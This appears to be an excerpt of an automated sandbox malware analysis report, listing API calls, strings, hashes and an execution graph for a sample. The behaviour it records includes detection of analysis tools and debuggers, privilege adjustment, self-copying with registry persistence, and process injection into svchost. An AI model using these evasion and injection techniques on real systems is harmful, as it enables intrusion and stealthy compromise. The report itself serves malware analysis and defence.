                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7e83c0000_uFVgJVXaEU.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Close$Handle$Open$CreateFileProcessProcess32$AttributesDeleteFirstNextSleepSnapshotTerminateToolhelp32Valuewcscmp
                                                                                                                                                                                                                        • String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
                                                                                                                                                                                                                        • API String ID: 2853470409-928700279
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1413318872.00007FF7E83C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E83C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413265435.00007FF7E83C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413340061.00007FF7E83C5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413354459.00007FF7E83C8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413377879.00007FF7E83C9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413397827.00007FF7E83CB000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7e83c0000_uFVgJVXaEU.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                        • String ID: rbNSpGEsyb
                                                                                                                                                                                                                        • API String ID: 299056699-189039185
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1413318872.00007FF7E83C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E83C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413265435.00007FF7E83C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413340061.00007FF7E83C5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413354459.00007FF7E83C8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413377879.00007FF7E83C9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413397827.00007FF7E83CB000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7e83c0000_uFVgJVXaEU.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 299056699-0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1413318872.00007FF7E83C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E83C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413265435.00007FF7E83C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413340061.00007FF7E83C5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413354459.00007FF7E83C8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413377879.00007FF7E83C9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413397827.00007FF7E83CB000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7e83c0000_uFVgJVXaEU.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileName$FindModulePathwcslenwcsncpy
                                                                                                                                                                                                                        • String ID: Unknown
                                                                                                                                                                                                                        • API String ID: 4220601557-1654365787
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1413318872.00007FF7E83C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E83C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413265435.00007FF7E83C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413340061.00007FF7E83C5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413354459.00007FF7E83C8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413377879.00007FF7E83C9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413397827.00007FF7E83CB000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7e83c0000_uFVgJVXaEU.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseOpenValue
                                                                                                                                                                                                                        • String ID: Hidden$Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
                                                                                                                                                                                                                        • API String ID: 779948276-85274793
Memory Dump Source
• Source File: 00000000.00000002.1413318872.00007FF7E83C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E83C0000, based on PE: true
• Associated: 00000000.00000002.1413265435.00007FF7E83C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413340061.00007FF7E83C5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413354459.00007FF7E83C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413377879.00007FF7E83C9000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413397827.00007FF7E83CB000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7e83c0000_uFVgJVXaEU.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                        • String ID: @$IsWow64Process$kernel32
                                                                                                                                                                                                                        • API String ID: 1646373207-1447682865
                                                                                                                                                                                                                        • Opcode ID: 603be1d157d8b7618cefaeb4c28c3fa88968313c4e816e205eb4bf900121f03c
                                                                                                                                                                                                                        • Instruction ID: 64073e574a5ca1b4cdb2daaf634adc2f32dc6ccf6073894765d3396a969584ca
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 603be1d157d8b7618cefaeb4c28c3fa88968313c4e816e205eb4bf900121f03c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8A01EC6290C642C6E730AB51E44432DF7B0FB94348FD8423AD68D42695DF7CD549DB29
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2850635065-0
                                                                                                                                                                                                                        • Opcode ID: 945e6c46026cac8d5227389c0b5a00d9d2c6e61c2b6681abe3b0584bd8c648a0
                                                                                                                                                                                                                        • Instruction ID: c951c73c061180e0e36ea24f99ea36649c9bfc5bcabe8d5c922ab985825d7f79
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 945e6c46026cac8d5227389c0b5a00d9d2c6e61c2b6681abe3b0584bd8c648a0
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3D112E71A0CA9281EB70AB15E48836EF3A0FB94754F84423AC69D42A98DF3DD504DB29
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                        • String ID: GetThreadId$kernel32
                                                                                                                                                                                                                        • API String ID: 1646373207-2383230424
                                                                                                                                                                                                                        • Opcode ID: 189d8e18f2860e48d93cbf03eb1ea96f13b6a920ccedb7e9900926061dd2bf98
                                                                                                                                                                                                                        • Instruction ID: 23861df8d353d4241067bbf54dba8f92c9ab13a755a245e8db8bb687fda3ae87
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 189d8e18f2860e48d93cbf03eb1ea96f13b6a920ccedb7e9900926061dd2bf98
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 60E01225918A93C2D724BB50F85432DF3A0FBA4744FD4023AD98D42664DF3CD559CB29
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3884: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C3A69), ref: 00007FF7E83C38CD
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C3A69), ref: 00007FF7E83C38E2
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C3A69), ref: 00007FF7E83C38F5
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3884: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C3A69), ref: 00007FF7E83C3905
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3884: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C3A69), ref: 00007FF7E83C3918
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C3A69), ref: 00007FF7E83C392D
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C3A69), ref: 00007FF7E83C3940
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C3A69), ref: 00007FF7E83C3955
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C4524: CreateFileW.KERNEL32 ref: 00007FF7E83C456B
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C10D8: OpenProcess.KERNEL32 ref: 00007FF7E83C10FC
                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32 ref: 00007FF7E83C2FC7
                                                                                                                                                                                                                        • HeapFree.KERNEL32 ref: 00007FF7E83C2FDA
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$CreateFileHeapProcess$AttributesDirectoryFolderFreeOpenPath
                                                                                                                                                                                                                        • String ID: .x64$chFrWWdQWsLFevUr
                                                                                                                                                                                                                        • API String ID: 1115570603-2286007224
                                                                                                                                                                                                                        • Opcode ID: 15d6fefc82c0193e12c752cbc5a593e68fb1e92f3234a397ae1e8610d6d43279
                                                                                                                                                                                                                        • Instruction ID: e3fd846cf6b782c40c9acf7693c5eaa9c27c9980c24ace678a063c13880dd1b3
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 15d6fefc82c0193e12c752cbc5a593e68fb1e92f3234a397ae1e8610d6d43279
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7E110A3191DA8281E710FB10E8483AEF3A0FBA4705F89013ED54C52B65DF7CE1498B7A

                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                        Execution Coverage:41.9%
                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                        Total number of Nodes:479
                                                                                                                                                                                                                        Total number of Limit Nodes:10
GetProcAddress 1091->1271 1093 7ff67e6d1f97 1272 7ff67e6d14ec LoadLibraryA GetProcAddress 1093->1272 1095 7ff67e6d1fb1 1273 7ff67e6d149c LoadLibraryA GetProcAddress 1095->1273 1097 7ff67e6d1fcb 1274 7ff67e6d14ec LoadLibraryA GetProcAddress 1097->1274 1099 7ff67e6d1fe5 1275 7ff67e6d14ec LoadLibraryA GetProcAddress 1099->1275 1101 7ff67e6d1fff 1276 7ff67e6d14ec LoadLibraryA GetProcAddress 1101->1276 1103 7ff67e6d2019 1277 7ff67e6d14ec LoadLibraryA GetProcAddress 1103->1277 1105 7ff67e6d2033 1278 7ff67e6d14ec LoadLibraryA GetProcAddress 1105->1278 1107 7ff67e6d204d 1279 7ff67e6d14ec LoadLibraryA GetProcAddress 1107->1279 1109 7ff67e6d2067 1280 7ff67e6d14ec LoadLibraryA GetProcAddress 1109->1280 1111 7ff67e6d2081 1281 7ff67e6d149c LoadLibraryA GetProcAddress 1111->1281 1113 7ff67e6d209b 1282 7ff67e6d149c LoadLibraryA GetProcAddress 1113->1282 1115 7ff67e6d20b5 1283 7ff67e6d14ec LoadLibraryA GetProcAddress 1115->1283 1117 7ff67e6d20cf 1284 7ff67e6d14ec LoadLibraryA GetProcAddress 1117->1284 1119 7ff67e6d20e9 1285 7ff67e6d14ec LoadLibraryA GetProcAddress 1119->1285 1121 7ff67e6d2103 1286 7ff67e6d14ec LoadLibraryA GetProcAddress 1121->1286 1123 7ff67e6d211d 1287 7ff67e6d14ec LoadLibraryA GetProcAddress 1123->1287 1125 7ff67e6d2137 1288 7ff67e6d14ec LoadLibraryA GetProcAddress 1125->1288 1127 7ff67e6d2151 1128 7ff67e6d31ac IsDebuggerPresent 1127->1128 1129 7ff67e6d31be GetCurrentProcess CheckRemoteDebuggerPresent 1128->1129 1130 7ff67e6d31ba 1128->1130 1129->1130 1130->843 1130->844 1132 7ff67e6d3431 1131->1132 1133 7ff67e6d40ca GetTokenInformation 1131->1133 1142 7ff67e6d3ca4 GetModuleFileNameW 1132->1142 1289 7ff67e6d3b14 VirtualAlloc 1133->1289 1135 7ff67e6d40fb GetTokenInformation 1136 7ff67e6d4142 AdjustTokenPrivileges CloseHandle 1135->1136 1137 7ff67e6d4128 CloseHandle 1135->1137 1290 7ff67e6d3ae4 1136->1290 1138 7ff67e6d3ae4 VirtualFree 1137->1138 1139 7ff67e6d413d 1138->1139 1139->1132 1143 7ff67e6d3d92 wcsncpy 1142->1143 1144 7ff67e6d3ccf PathFindFileNameW wcslen 
1142->1144 1145 7ff67e6d3d09 1143->1145 1144->1145 1145->848 1147 7ff67e6d4210 GetLastError 1146->1147 1148 7ff67e6d3468 1146->1148 1147->1148 1149 7ff67e6d421d CloseHandle 1147->1149 1148->855 1148->857 1149->1148 1293 7ff67e6d3884 1150->1293 1152 7ff67e6d32ad 1296 7ff67e6d4524 CreateFileW 1152->1296 1154 7ff67e6d32c5 1155 7ff67e6d3307 CreateThread 1154->1155 1308 7ff67e6d4084 1154->1308 1155->869 1160 7ff67e6d3884 11 API calls 1159->1160 1161 7ff67e6d321c 1160->1161 1344 7ff67e6d42f4 CreateFileW 1161->1344 1165 7ff67e6d3704 3 API calls 1164->1165 1166 7ff67e6d3a5f 1165->1166 1167 7ff67e6d3884 11 API calls 1166->1167 1168 7ff67e6d3a69 GetModuleFileNameW DeleteFileW CopyFileW 1167->1168 1169 7ff67e6d3aab SetFileAttributesW 1168->1169 1170 7ff67e6d3557 1168->1170 1356 7ff67e6d3974 RegOpenKeyExW 1169->1356 1172 7ff67e6d339c GetVersionExW 1170->1172 1173 7ff67e6d33cd 1172->1173 1173->882 1173->883 1174->899 1175->901 1176->903 1177->905 1178->907 1179->909 1180->911 1181->913 1182->915 1183->917 1184->919 1185->921 1186->923 1187->925 1188->927 1189->929 1190->931 1191->933 1192->935 1193->937 1194->939 1195->941 1196->943 1197->945 1198->947 1199->949 1200->951 1201->953 1202->955 1203->957 1204->959 1205->961 1206->963 1207->965 1208->967 1209->969 1210->971 1211->973 1212->975 1213->977 1214->979 1215->981 1216->983 1217->985 1218->987 1219->989 1220->991 1221->993 1222->995 1223->997 1224->999 1225->1001 1226->1003 1227->1005 1228->1007 1229->1009 1230->1011 1231->1013 1232->1015 1233->1017 1234->1019 1235->1021 1236->1023 1237->1025 1238->1027 1239->1029 1240->1031 1241->1033 1242->1035 1243->1037 1244->1039 1245->1041 1246->1043 1247->1045 1248->1047 1249->1049 1250->1051 1251->1053 1252->1055 1253->1057 1254->1059 1255->1061 1256->1063 1257->1065 1258->1067 1259->1069 1260->1071 1261->1073 1262->1075 1263->1077 1264->1079 1265->1081 1266->1083 1267->1085 1268->1087 1269->1089 1270->1091 1271->1093 1272->1095 1273->1097 1274->1099 1275->1101 1276->1103 
1277->1105 1278->1107 1279->1109 1280->1111 1281->1113 1282->1115 1283->1117 1284->1119 1285->1121 1286->1123 1287->1125 1288->1127 1289->1135 1291 7ff67e6d3af5 VirtualFree 1290->1291 1292 7ff67e6d3b08 1290->1292 1291->1292 1292->1132 1328 7ff67e6d3704 GetWindowsDirectoryW 1293->1328 1295 7ff67e6d38b3 8 API calls 1295->1152 1297 7ff67e6d4585 GetFileSize GetProcessHeap RtlAllocateHeap 1296->1297 1298 7ff67e6d457e 1296->1298 1299 7ff67e6d45ce CloseHandle 1297->1299 1300 7ff67e6d45e0 ReadFile 1297->1300 1298->1154 1299->1298 1301 7ff67e6d462f 1300->1301 1302 7ff67e6d4607 GetProcessHeap HeapFree CloseHandle 1300->1302 1303 7ff67e6d4648 GetProcessHeap HeapFree CloseHandle 1301->1303 1305 7ff67e6d4670 1301->1305 1302->1298 1303->1298 1304 7ff67e6d47db GetProcessHeap RtlFreeHeap CloseHandle 1304->1298 1305->1304 1306 7ff67e6d472b GetProcessHeap RtlAllocateHeap 1305->1306 1307 7ff67e6d4774 1306->1307 1307->1304 1333 7ff67e6d3fc4 CreateToolhelp32Snapshot 1308->1333 1311 7ff67e6d10d8 OpenProcess 1312 7ff67e6d111f 1311->1312 1315 7ff67e6d1115 1311->1315 1340 7ff67e6d13c4 GetModuleHandleA GetProcAddress 1312->1340 1314 7ff67e6d112c 1314->1315 1316 7ff67e6d11fe VirtualAllocEx 1314->1316 1315->1155 1316->1315 1317 7ff67e6d124f WriteProcessMemory 1316->1317 1317->1315 1318 7ff67e6d1286 WriteProcessMemory 1317->1318 1318->1315 1319 7ff67e6d12d1 1318->1319 1342 7ff67e6d1444 GetSystemInfo 1319->1342 1322 7ff67e6d12fe GetModuleHandleA GetProcAddress 1322->1315 1324 7ff67e6d1338 RtlCreateUserThread 1322->1324 1323 7ff67e6d1444 GetSystemInfo 1325 7ff67e6d12f4 1323->1325 1324->1315 1326 7ff67e6d1399 CloseHandle 1324->1326 1325->1322 1325->1326 1327 7ff67e6d13b2 1326->1327 1327->1315 1329 7ff67e6d374e 1328->1329 1330 7ff67e6d3758 GetVolumeInformationW 1328->1330 1329->1330 1332 7ff67e6d37d4 1330->1332 1331 7ff67e6d383e wsprintfW 1331->1295 1332->1331 1334 7ff67e6d3fff Process32FirstW 1333->1334 1335 7ff67e6d32f2 1333->1335 1336 7ff67e6d401e wcscmp 1334->1336 1337 7ff67e6d4059 CloseHandle 
1334->1337 1335->1311 1338 7ff67e6d4042 Process32NextW 1336->1338 1339 7ff67e6d4035 1336->1339 1337->1335 1338->1336 1338->1337 1339->1337 1341 7ff67e6d13ff 1340->1341 1341->1314 1343 7ff67e6d12ea 1342->1343 1343->1322 1343->1323 1345 7ff67e6d434a 1344->1345 1346 7ff67e6d436b GetLastError 1344->1346 1350 7ff67e6d4244 GetFileSize 1345->1350 1348 7ff67e6d322f CreateThread Sleep CreateThread 1346->1348 1348->871 1355 7ff67e6d3b14 VirtualAlloc 1350->1355 1352 7ff67e6d4270 1353 7ff67e6d42ba CloseHandle 1352->1353 1354 7ff67e6d4284 SetFilePointer ReadFile 1352->1354 1353->1348 1354->1353 1355->1352 1357 7ff67e6d39b5 1356->1357 1358 7ff67e6d39b9 RegSetValueExW RegCloseKey 1356->1358 1357->1170 1358->1357 1359 7ff67e6d317c 1360 7ff67e6d3185 1359->1360 1361 7ff67e6d319e 1360->1361 1364 7ff67e6d2ffc 1360->1364 1369 7ff67e6d2dfc CreateMutexExA 1364->1369 1367 7ff67e6d305c SleepEx 1367->1360 1368 7ff67e6d3017 Sleep CreateThread WaitForSingleObject 1368->1367 1370 7ff67e6d2e45 GetLastError 1369->1370 1371 7ff67e6d2e28 ReleaseMutex CloseHandle 1369->1371 1373 7ff67e6d2e52 ReleaseMutex CloseHandle 1370->1373 1374 7ff67e6d2e6f ReleaseMutex CloseHandle 1370->1374 1372 7ff67e6d2e87 1371->1372 1372->1367 1372->1368 1373->1372 1374->1372 1375 7ff67e6d2f2c 1376 7ff67e6d3884 11 API calls 1375->1376 1377 7ff67e6d2f6b 1376->1377 1378 7ff67e6d4524 17 API calls 1377->1378 1379 7ff67e6d2f8f 1378->1379 1380 7ff67e6d4084 5 API calls 1379->1380 1381 7ff67e6d2fb2 1380->1381 1382 7ff67e6d10d8 11 API calls 1381->1382 1383 7ff67e6d2fc7 GetProcessHeap HeapFree 1382->1383 1384 7ff67e6d2e9c CreateMutexA 1385 7ff67e6d2ede GetLastError 1384->1385 1386 7ff67e6d2ec1 ReleaseMutex CloseHandle 1384->1386 1388 7ff67e6d2eeb ReleaseMutex CloseHandle 1385->1388 1389 7ff67e6d2f08 ReleaseMutex CloseHandle 1385->1389 1387 7ff67e6d2f20 1386->1387 1388->1387 1389->1387 1392 7ff67e6d337c 1395 7ff67e6d24cc GetModuleFileNameW 1392->1395 1396 7ff67e6d254d 1395->1396 1402 7ff67e6d2548 1395->1402 1397 7ff67e6d25a1 
1396->1397 1398 7ff67e6d258b 1396->1398 1438 7ff67e6d240c ExpandEnvironmentStringsW 1397->1438 1399 7ff67e6d2595 1398->1399 1400 7ff67e6d25bf 1398->1400 1399->1402 1440 7ff67e6d248c ExpandEnvironmentStringsW 1399->1440 1439 7ff67e6d244c ExpandEnvironmentStringsW 1400->1439 1403 7ff67e6d25b6 1403->1402 1406 7ff67e6d2611 CreateProcessW 1403->1406 1406->1402 1407 7ff67e6d266c CreateFileW 1406->1407 1407->1402 1408 7ff67e6d26b3 GetFileSize 1407->1408 1409 7ff67e6d26d1 1408->1409 1410 7ff67e6d26db CloseHandle 1408->1410 1409->1410 1411 7ff67e6d26eb VirtualAlloc 1409->1411 1410->1402 1412 7ff67e6d2725 ReadFile 1411->1412 1413 7ff67e6d2715 CloseHandle 1411->1413 1414 7ff67e6d2752 VirtualFree CloseHandle 1412->1414 1415 7ff67e6d2775 CloseHandle GetThreadContext 1412->1415 1413->1402 1414->1402 1416 7ff67e6d27c5 VirtualFree 1415->1416 1417 7ff67e6d27dd ReadProcessMemory GetModuleHandleA GetProcAddress 1415->1417 1416->1402 1418 7ff67e6d2860 1417->1418 1419 7ff67e6d2864 VirtualFree 1418->1419 1420 7ff67e6d287c VirtualAllocEx 1418->1420 1419->1402 1421 7ff67e6d28ff WriteProcessMemory 1420->1421 1422 7ff67e6d28e7 VirtualFree 1420->1422 1423 7ff67e6d2935 VirtualFree 1421->1423 1426 7ff67e6d294d 1421->1426 1422->1402 1423->1402 1424 7ff67e6d2983 WriteProcessMemory 1425 7ff67e6d2a0e VirtualFree 1424->1425 1424->1426 1425->1402 1426->1424 1431 7ff67e6d2a2b 1426->1431 1427 7ff67e6d2d1c WriteProcessMemory SetThreadContext 1429 7ff67e6d2da2 VirtualFree 1427->1429 1430 7ff67e6d2db7 ResumeThread 1427->1430 1428 7ff67e6d2a9d RtlCompareMemory 1428->1431 1435 7ff67e6d2af0 1428->1435 1429->1402 1432 7ff67e6d2dde VirtualFree 1430->1432 1433 7ff67e6d2dc9 VirtualFree 1430->1433 1431->1427 1431->1428 1432->1402 1433->1402 1434 7ff67e6d2d17 1434->1427 1435->1434 1436 7ff67e6d2c20 ReadProcessMemory WriteProcessMemory 1435->1436 1436->1435 1437 7ff67e6d2cf5 VirtualFree 1436->1437 1437->1402 1438->1403 1439->1403 1440->1403 1441 7ff67e6d306c 1442 7ff67e6d3075 1441->1442 1443 7ff67e6d3161 
1442->1443 1446 7ff67e6d3be4 RegDeleteKeyW 1442->1446 1447 7ff67e6d3de4 9 API calls 1442->1447 1448 7ff67e6d3974 3 API calls 1442->1448 1450 7ff67e6d4404 CreateFileW 1442->1450 1455 7ff67e6d3b44 RegOpenKeyExW 1442->1455 1446->1442 1447->1442 1449 7ff67e6d3151 Sleep 1448->1449 1449->1442 1451 7ff67e6d445f 1450->1451 1452 7ff67e6d449a 1450->1452 1458 7ff67e6d4384 SetFilePointer WriteFile SetEndOfFile 1451->1458 1452->1442 1454 7ff67e6d447b SetFileAttributesW CloseHandle 1454->1452 1456 7ff67e6d3bd2 1455->1456 1457 7ff67e6d3b98 RegSetValueExW RegCloseKey 1455->1457 1456->1442 1457->1456 1458->1454 1479 7ff67e6d333c 1480 7ff67e6d24cc 36 API calls 1479->1480 1481 7ff67e6d334c 1480->1481 1390 7ff67e6d1088 GetModuleHandleA GetProcAddress 1391 7ff67e6d10bb 1390->1391

                                                                                                                                                                                                                        Callgraph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        • Opacity -> Relevance
                                                                                                                                                                                                                        • Disassembly available

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
Memory Dump Source
• Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
• Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ExitProcess$DebuggerPresent
                                                                                                                                                                                                                        • String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_BAccdq$worker_FDhvwc$worker_RdDwvE$worker_kBEqZh
                                                                                                                                                                                                                        • API String ID: 613740775-1953711635
                                                                                                                                                                                                                        • Opcode ID: 038771749d3d7642afb54e91ef10106eb0bf85de265d58aed9308be7d6a062b0
                                                                                                                                                                                                                        • Instruction ID: 5cb57e2c051abffecc5ed2acf8bde7d1034dc4503263405450667cb2db5308f6
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 038771749d3d7642afb54e91ef10106eb0bf85de265d58aed9308be7d6a062b0
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5F61FD2AA68A8381EE65EB21E85937B6260AFB4700FF00135F54EC65D6DE2DE50DE610

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
Memory Dump Source
• Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
• Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: OpenProcess
                                                                                                                                                                                                                        • String ID: $@$RtlCreateUserThread$ntdll
                                                                                                                                                                                                                        • API String ID: 3743895883-721857904

                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmp
